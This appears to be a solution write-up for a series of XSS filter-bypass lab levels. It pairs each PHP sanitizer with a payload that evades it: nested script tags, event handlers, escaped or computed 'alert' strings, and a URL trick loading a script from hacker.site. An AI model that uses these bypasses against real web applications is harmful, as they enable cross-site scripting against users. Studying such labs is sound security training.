The goal of these labs are to bypass the filter that is given to you. To pass the level you have to pop an alert box with 'l33t'.
function Sanitizer($search){
// Let's start...
return 'Your search "<b>' . $search . '</b>" did not match any products';
}<script>alert('l33t');</script>
Last updated
function Sanitizer($search){
//To script, or not script..
$search = preg_replace('#<script([\s])*>#is', NOSCRIPT, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<script <script>>alert('l33t')</script>function Sanitizer($search){
//To script, or not script... this is no more the problem
$search = preg_replace('#<script(.*?)>#is', NOSCRIPT, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<IMG SRC=/ onerror="alert('l33t')"></img>function Sanitizer($search){
//Script must be closed, here's a stronger filter... isn't it?
$search = preg_replace('#<script(.*?)>(.*?)</script(.*)?>#is', NOSCRIPT, $search);
//No ON no party!
$search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<svg><x><script>alert('l33t')function Sanitizer($search){
//No ON no party!
$search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search);
//No Functions no party!
$search = preg_replace('#[()]#s', NOFUNCTIONS, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<svg><script>alert('l33t')</script>function Sanitizer($search){
//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<script>\u0061lert('l33t')</script>function Sanitizer($search){
// No Unicode escaping.. there are a lot of smart guys out of there...
// Thanks to stackoverflow.com > http://bit.ly/SO_decode_unicode
$search = preg_replace_callback('/\\\\u([0-9a-fA-F]{4})/', function ($m) {
return mb_convert_encoding(pack('H*', $m[1]), 'UTF-8', 'UCS-2BE');
}, $search);
//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<script>eval("\x61lert('l33t')")</script>function Sanitizer($search){
// Breaking bad...
//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);
return <<<RESULT
No products here..
<!-- todo: debug this -->
<script>
//console.debug( $search );
</script>
RESULT;
}<script>eval("\x61lert('l33t')")</script>function Sanitizer($search){
// Breaking bad... more stronger
$search = preg_replace('#[\n\r]#', "", $search);
//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);
return <<<RESULT
No products here..
<!-- todo: debug this -->
<script>
//console.debug( $search );
</script>
RESULT;
}<script>eval("\x61lert('l33t')")</script>function Sanitizer($search){
// No more string ...
$search = preg_replace('#[\'"+]#', "", $search);
// ... no more alert ...
$search = preg_replace('#alert#is', NOALERT, $search);
// ... no no more alternative ways!
$search = preg_replace('#.source#is', "", $search);
$search = preg_replace('#.fromCharCode#is', "", $search);
return 'Your search "<b>' + $search + '</b>" did not match any products';
}<script>eval(8680439..toString(30))(983801..toString(36))</script>function Sanitizer($search){
// No scripts from untrusted origins or you'll see a nice gorilla
preg_match('#^(?:https?:)?\/\/11.xss.labs\/#is', urldecode($search), $matches);
if(empty($matches)) $search = "...untrusted...";
// don't break the src tag
$search = preg_replace('#"#', "", $search);
// ehehe and now? Are you still a ninja?
$search = strtoupper($search);
}function myFunction() {
eval(8680439..toString(30))(983801..toString(36))
}
myFunction();http://11.xss.labs%2F@hacker.site/x.js